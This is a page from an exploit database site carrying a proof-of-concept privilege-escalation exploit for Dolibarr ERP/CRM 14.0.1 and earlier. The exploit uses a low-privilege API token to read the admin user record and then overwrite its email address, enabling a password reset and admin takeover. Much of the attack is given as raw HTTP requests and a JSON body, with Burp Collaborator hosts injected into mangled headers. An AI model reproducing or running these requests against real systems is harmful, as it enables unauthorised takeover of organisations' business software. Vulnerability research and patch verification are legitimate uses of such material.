0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dolibarr ERP / CRM 14.0.1 - Privilege Escalation Vulnerability
[# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.dolibarr.org/
# Affected Version: <= 14.0.1
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
*Summary:*
Using the below chain of issues attacker can compromise any dolibarr
user account including the admin.
*Poc:*
1. Visit https://example.com/api/index.php/login?login=demo&password=demo
try to login with a test user with 0 permissons or less permissions.
2. We will receive an api token in return.
3. Next we need to fetch the user id of the user whose account we want
to own.
*First we need to fetch the user id of the admin user using the below api.*
*Request1:*
GET /api/index.php/users/login/admin HTTP/1.1Host:
preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
*This will return the user details using the username. Now update the
victim user account via below api (include the json body received from the
previous request1 and replace the email id from below json to the attacker
controlled email)*
*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
deflateDOLAPIKEY: test1337Origin:
https://preview2.dolibarr.orgConnection: closeReferer:
http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
3221
{
"id": "12",
"statut": "1",
"employee": "1",
"civility_code": null,
"gender": "woman",
"birth": 495583200,
"email": "*attacker@example.com <attacker@example.com>*",
"personal_email": "",
"socialnetworks": {
"facebook": "",
"skype": "",
"twitter": "",
"linkedin": "",
"instagram": "",
"snapchat": "",
"googleplus": "",
"youtube": "",
"whatsapp": "",
"tumblr": "",
"vero": "",
"viadeo": "",
"slack": "",
"xing": "",
"meetup": "",
"pinterest": "",
"flickr": "",
"500px": "",
"giphy": "",
"gifycat": "",
"dailymotion": "",
"vimeo": "",
"periscope": "",
"twitch": "",
"discord": "",
"wikipedia": "",
"reddit": "",
"quora": "",
"tripadvisor": "",
"mastodon": "",
"diaspora": "",
"viber": ""
},
"job": "Admin Technical",
"signature": "",
"address": "",
"zip": "",
"town": "",
"state_id": null,
"state_code": null,
"state": null,
"office_phone": "",
"office_fax": "",
"user_mobile": "",
"personal_mobile": "",
"admin": "1",
"login": "admin",
"entity": "0",
"datec": 1507187386,
"datem": 1617819214,
"socid": null,
"contact_id": null,
"fk_member": null,
"fk_user": "11",
"fk_user_expense_validator": null,
"fk_user_holiday_validator": null,
"clicktodial_url": null,
"clicktodial_login": null,
"clicktodial_poste": null,
"datelastlogin": 1617816891,
"datepreviouslogin": 1617815935,
"datestartvalidity": "",
"dateendvalidity": "",
"photo": "com.jpg",
"lang": "fr_FR",
"rights": {
"user": {
"user": {},
"self": {}
}
},
"conf": {},
"users": [],
"parentof": null,
"accountancy_code": "",
"weeklyhours": "39.00000000",
"color": "",
"dateemployment": "",
"dateemploymentend": "",
"default_c_exp_tax_cat": null,
"default_range": null,
"fk_warehouse": null,
"import_key": null,
"array_options": [],
"array_languages": null,
"linkedObjectsIds": null,
"canvas": null,
"fk_project": null,
"contact": null,
"thirdparty": null,
"user": null,
"origin": null,
"origin_id": null,
"ref": "12",
"ref_ext": null,
"status": null,
"country": null,
"country_id": null,
"country_code": "",
"region_id": null,
"barcode_type": null,
"barcode_type_code": null,
"barcode_type_label": null,
"barcode_type_coder": null,
"mode_reglement_id": null,
"cond_reglement_id": null,
"demand_reason_id": null,
"transport_mode_id": null,
"cond_reglement": null,
"modelpdf": null,
"last_main_doc": null,
"fk_bank": null,
"fk_account": null,
"note_public": "",
"note_private": "",
"note": "",
"name": null,
"lastname": "Adminson",
"firstname": "Alice",
"civility_id": null,
"date_creation": null,
"date_validation": null,
"date_modification": null,
"specimen": 0,
"alreadypaid": null,
"liste_limit": 0
}
This will reset the admin email account to the attacker controlled
email account, now using the password reset feature attacker will
reset the admin account password and will gain access to the admin
account.
# 0day.today [2024-11-14] #